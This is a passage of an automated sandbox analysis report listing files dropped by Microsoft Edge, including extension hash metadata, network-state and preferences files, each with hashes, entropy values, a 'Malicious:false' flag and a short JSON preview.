                                                                                        Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):429
                                                                                        Entropy (8bit):5.809210454117189
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                        MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                        SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                        SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                        SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\3fc1086f-b363-42e4-a2c3-018df6949a59.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1452
                                                                                        Entropy (8bit):5.287526653429432
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n+:YcCpWsktsHnfc7CvsfgCgakhYhbj
                                                                                        MD5:C11A0C2888E9122AF3E0A9532E7CF485
                                                                                        SHA1:213F8630A4D6B265DB899E1B4FED27EC8F2F1C75
                                                                                        SHA-256:F08277C5DFC76862C95DA3763626FC4A099530B656C9ED5C42DE6E3079D64B57
                                                                                        SHA-512:BB02933E6DF73CF073C94460869B99200E08C1B293D476B6F7C76F012B0BF9126A60031A31555CB755DF9C464B16272FEB6B1E0C0528FFAF5BB934F5E87A279E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\5787cfb5-0d93-404c-b174-ec9354249f2a.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\7368693d-6792-44d8-a00f-53378c94ffe6.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):188
                                                                                        Entropy (8bit):5.331182600457533
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YWRAWNjGYp1WRlPI0omRSSXmQh3wYHGKB8HQXwlm9yJUA6XcIR6RX77XMqdvXdXw:YWyWNiYp1WRlBv31dB8wXwlmUUAnIMpW
                                                                                        MD5:BF05AB80996294638E9204D2D5322C25
                                                                                        SHA1:E8E4EE8F76601F6082A7BE07219FA8D35CD1CC31
                                                                                        SHA-256:442D1633B28D6525AE4E4F3541948420FB7A69F54E5A73695A8424BA47AED6C2
                                                                                        SHA-512:54B19F9AD4F0DD10981EAB7DCD1583E0331E8BEC738A086B0F112DCD6EE0B1CBB2E8A88AE3CCF2F0CBF5C62544CA1427CE15FEACD976FBB43FE56050410B6896
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"sts":[{"expiry":1753334082.456183,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1721798082.456188}],"version":2}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\7a924af8-ba72-4267-b1a0-4b168c84e662.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:modified
                                                                                        Size (bytes):2692
                                                                                        Entropy (8bit):5.306743541675203
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:YcCpfC0gCzsEtsGOBrcsGGgsF/sofcKsl4akEsy+HiesdVCxbj:F2fhnturNtxu4akW4MVA/
                                                                                        MD5:A74F6932400688601AAB5823AF2EBE8F
                                                                                        SHA1:B222F75C9CFBEF6BDF3299D73F36A9968FA0E372
                                                                                        SHA-256:10A810D93005586A59EEFDEE92B676B16279384D8C86805D96AC0CD7DA8AD1C3
                                                                                        SHA-512:5FB02BAEBE25F4C4FB2D819E84973BACC74562A69D06F46D321F5299BF18BD5EE5712975CDBAE9D05013E332C2F5DAE5A4D11131E0219CC74C0FC75F7BB5591B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13368863672035720","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13368863672219300","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABMAAABodHRwczovL3lvdXR1YmUuY29tAA==",false],"server":"https://www.youtube.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13368863681463409","port":443,"protocol_str":"quic"}]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\89e6aca6-b277-4abd-b1de-1335aa8b6196.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):40
                                                                                        Entropy (8bit):4.1275671571169275
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1452
                                                                                        Entropy (8bit):5.287526653429432
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n+:YcCpWsktsHnfc7CvsfgCgakhYhbj
                                                                                        MD5:C11A0C2888E9122AF3E0A9532E7CF485
                                                                                        SHA1:213F8630A4D6B265DB899E1B4FED27EC8F2F1C75
                                                                                        SHA-256:F08277C5DFC76862C95DA3763626FC4A099530B656C9ED5C42DE6E3079D64B57
                                                                                        SHA-512:BB02933E6DF73CF073C94460869B99200E08C1B293D476B6F7C76F012B0BF9126A60031A31555CB755DF9C464B16272FEB6B1E0C0528FFAF5BB934F5E87A279E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF4d4e0.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1452
                                                                                        Entropy (8bit):5.287526653429432
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n+:YcCpWsktsHnfc7CvsfgCgakhYhbj
                                                                                        MD5:C11A0C2888E9122AF3E0A9532E7CF485
                                                                                        SHA1:213F8630A4D6B265DB899E1B4FED27EC8F2F1C75
                                                                                        SHA-256:F08277C5DFC76862C95DA3763626FC4A099530B656C9ED5C42DE6E3079D64B57
                                                                                        SHA-512:BB02933E6DF73CF073C94460869B99200E08C1B293D476B6F7C76F012B0BF9126A60031A31555CB755DF9C464B16272FEB6B1E0C0528FFAF5BB934F5E87A279E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3d8ec.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3ed9d.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF40358.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):40
                                                                                        Entropy (8bit):4.1275671571169275
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):188
                                                                                        Entropy (8bit):5.331182600457533
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YWRAWNjGYp1WRlPI0omRSSXmQh3wYHGKB8HQXwlm9yJUA6XcIR6RX77XMqdvXdXw:YWyWNiYp1WRlBv31dB8wXwlmUUAnIMpW
                                                                                        MD5:BF05AB80996294638E9204D2D5322C25
                                                                                        SHA1:E8E4EE8F76601F6082A7BE07219FA8D35CD1CC31
                                                                                        SHA-256:442D1633B28D6525AE4E4F3541948420FB7A69F54E5A73695A8424BA47AED6C2
                                                                                        SHA-512:54B19F9AD4F0DD10981EAB7DCD1583E0331E8BEC738A086B0F112DCD6EE0B1CBB2E8A88AE3CCF2F0CBF5C62544CA1427CE15FEACD976FBB43FE56050410B6896
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"sts":[{"expiry":1753334082.456183,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1721798082.456188}],"version":2}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a9212ae3-5334-4718-a236-62d07227efcc.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\bd849def-3c37-4ce0-8cf0-21f79b547124.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\fd15a7f0-bce1-45df-96a9-14d649dcf222.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):9496
                                                                                        Entropy (8bit):5.102198319093565
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:strkdZs6haFvrEmkO33a38WbV+FiADUrPVYJ:strSs6hCDX6PbGiPO
                                                                                        MD5:A0C2A6BB55818308AC0F5088517238CE
                                                                                        SHA1:6B1D0885663DB256E2C13F38CBF3AFADEC0F705A
                                                                                        SHA-256:0740A4D059B672C3F7314B96598E66030D66751AAB41663CEAD70C45261ABDAD
                                                                                        SHA-512:0BD215A11488F448A4248AA76FD07921F65FF55D8D5B5BE6290B266E80A9541629FE03F2D6A79F9EECE01149CFDA9F7A49C236A9DA818CFBE41B92732824415B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366271670076295","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_la

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3fd8b.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):9496
                                                                                        Entropy (8bit):5.102198319093565
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:strkdZs6haFvrEmkO33a38WbV+FiADUrPVYJ:strSs6hCDX6PbGiPO
                                                                                        MD5:A0C2A6BB55818308AC0F5088517238CE
                                                                                        SHA1:6B1D0885663DB256E2C13F38CBF3AFADEC0F705A
                                                                                        SHA-256:0740A4D059B672C3F7314B96598E66030D66751AAB41663CEAD70C45261ABDAD
                                                                                        SHA-512:0BD215A11488F448A4248AA76FD07921F65FF55D8D5B5BE6290B266E80A9541629FE03F2D6A79F9EECE01149CFDA9F7A49C236A9DA818CFBE41B92732824415B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366271670076295","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_la

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF44794.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):9496
                                                                                        Entropy (8bit):5.102198319093565
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:strkdZs6haFvrEmkO33a38WbV+FiADUrPVYJ:strSs6hCDX6PbGiPO
                                                                                        MD5:A0C2A6BB55818308AC0F5088517238CE
                                                                                        SHA1:6B1D0885663DB256E2C13F38CBF3AFADEC0F705A
                                                                                        SHA-256:0740A4D059B672C3F7314B96598E66030D66751AAB41663CEAD70C45261ABDAD
                                                                                        SHA-512:0BD215A11488F448A4248AA76FD07921F65FF55D8D5B5BE6290B266E80A9541629FE03F2D6A79F9EECE01149CFDA9F7A49C236A9DA818CFBE41B92732824415B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
